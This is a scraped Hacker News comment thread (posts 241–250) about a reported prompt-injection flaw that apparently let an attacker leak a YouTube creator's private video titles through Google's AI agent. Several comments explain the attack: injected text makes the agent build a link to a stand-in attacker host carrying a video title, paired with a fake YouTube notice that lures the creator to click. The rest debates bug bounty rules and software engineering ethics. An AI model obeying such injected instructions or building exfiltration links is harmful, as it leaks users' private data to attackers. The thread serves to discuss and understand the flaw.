Live data from Hacker News

Leaking YouTube creators' private videos

javoriuski.com

241–250 of 436 posts

Re: Leaking YouTube creators' private videos

#241

I've reported bugs to google VRP and got paid. The main problem with this report is that the victim has to click a suspicious link which is similar to phishing through email. No bounty programs award bounty for phishing. This is not to say this isn't a bug. The author has to find a way to escalate the impact. If they are able to achieve the same impact without user interaction the impact will be high enough for bount…

What suspicious link? The person is in their AI-powered page that google provides with pre-cooked suggested prompts. If the user clicks one of those and triggers the security explait, is that what you are calling suspicious? I don't.

Re: Leaking YouTube creators' private videos

#242

Earlier quoted context omitted.

I think the problem I see with your argument is that people simply do not value reliable and secure consumer software as much as they'd value reliable and secure airplanes. Of course, software that is in charge of things where people value security a lot, such as the software in airplanes, is much more scrutinized and adheres to better standards. This is the case precisely because when it goes bad people die in ways…

> people simply do not value reliable and secure consumer software Because the incentive to care is not there, we'll see things changing when self-driving cats is mainstream

I want one that can drive itself to the vet!

Re: Leaking YouTube creators' private videos

#243
post #149

Earlier quoted context omitted.

[flagged]

> This is a prime example of why programmers are not seriously considered engineers. I'm a programmer working in healthcare. If I ignore a safety issue anyone discovered, people die and we go to prison. Am I an engineer now?

I used to be a sysadmin at hospitals. There is software in everything like biomed devices, imaging machines and even the humble email system that I maintained.

Other examples of critical software systems include banking and voting.

I have never _ever_ called myself an engineer even when I was encouraged to.

It is foolish to leave this field unregulated.

Re: Leaking YouTube creators' private videos

#244
post #46

Earlier quoted context omitted.

What do you mean? Youtube is unquestionably one of the most successful projects ever launched? Seems like the process works astoundingly well.

Youtube survives on google's massive repertoire of products being vastly more profitable, not because it's the best of its kind.

[deleted]

Re: Leaking YouTube creators' private videos

#245
post #226
post #149

Earlier quoted context omitted.

[flagged]

Last year alone, 40 people died in Spain in a train derailment. In total, how many people have died over the last 100 years because of something a software engineer did?

Probably more than we'd like to admit. This isn't new either (https://en.wikipedia.org/wiki/Therac-25 for example).

Thinking software developers have done no wrong (deliberately or not) ever is just borderline naive.

Re: Leaking YouTube creators' private videos

#246
post #239

Conceptually I understand, but the specific example doesn't click for me > https://attacker-website.com/view/channel?video=BANG ) replacing BANG with the title of a video on this channel. >When the creator clicked the link, I received a request with the video title in the URL parameter. The creator didn't type anything or make any unusual decision. They just clicked what looked like a legitimate link given by YouTube…

> replacing BANG with the title of _a_ video on this channel.

The agent has knowledge of private videos, so the proof of concept causes it to construct a URL that sends one video identity to the attacker which may be a private video. The attack could be improved to say "a recent private video", or to construct a long url param list of the most 10 most recent videos, etc. Sending any agent knowledge to an attacker is a vector to sending any agent knowledge to an attacker.

Re: Leaking YouTube creators' private videos

#247
post #239

Conceptually I understand, but the specific example doesn't click for me > https://attacker-website.com/view/channel?video=BANG ) replacing BANG with the title of a video on this channel. >When the creator clicked the link, I received a request with the video title in the URL parameter. The creator didn't type anything or make any unusual decision. They just clicked what looked like a legitimate link given by YouTube…

Ah, now I get everyone's confusion. My understanding of the attack is that it involves (1) prompt injection of the AI Studio agent to replace the URL value ("replacing BANG...") and (2) phishing of the creator to click the link to exfil data, using the official looking "[Important Notice from YouTube]" banner. As some point out, this is like two prompt injections.

Perhaps Google was also confused by the author's explanation.

Re: Leaking YouTube creators' private videos

#248

Earlier quoted context omitted.

> This is a prime example of why programmers are not seriously considered engineers. Seems to me like your comment is simply an example of prejudice. You're just describing another standardized incentive structure that you're operating in, and using that as a basis to extrapolate that programmers of all kinds—whether they work on a video platform or on machinery that could cause catastrophe if it fails—are implicitly…

An example of prejudice? What an extraordinary statement. It’s an example of ethical, competent, responsible professionalism. The ‘incentive structure’ is non-financial and based on the ethics of valuing other humans. This is a professional duty. To even call it a ‘incentive structure’ feels like it’s missing the point.

The comment is prejudice to conclude from the Google Engineer's supposed thought process as fact and to say that it's an example of why he isn't an 'engineer'. But you can find classic engineering fields where due process is ignored due to systemic pressures - like the Challenger incident. They were engineers but the system was broken. So it's not good enough to spit on the ground and say this is why they are not engineers.

Re: Leaking YouTube creators' private videos

#249
I don't understand, how does this leak a private video title¹ when you need to post a comment on the video you want to leak? Aren't you on the video page at that point?

And the creator needs to click the link inside of a comment section or summary thereof. I disagree with Google saying that phishing vectors are irrelevant for security (it's basically the top vector and Google knows that), but it's hard to disagree with the technical classification as such

¹ but not contents or other info (like the ID) that lets you access the contents, as the title suggests by saying "leaking private videos". The PoC asks the LLM to insert the title in a URL with a third-party domain. I presume the bot doesn't know the page URL, otherwise the author would have used/added that as it's much more impactful

Re: Leaking YouTube creators' private videos

#250

Earlier quoted context omitted.

> This is a prime example of why programmers are not seriously considered engineers. I'm a programmer working in healthcare. If I ignore a safety issue anyone discovered, people die and we go to prison. Am I an engineer now?

I used to be a sysadmin at hospitals. There is software in everything like biomed devices, imaging machines and even the humble email system that I maintained. Other examples of critical software systems include banking and voting. I have never _ever_ called myself an engineer even when I was encouraged to. It is foolish to leave this field unregulated.

Medical device software is very strictly regulated.
Post reply on HN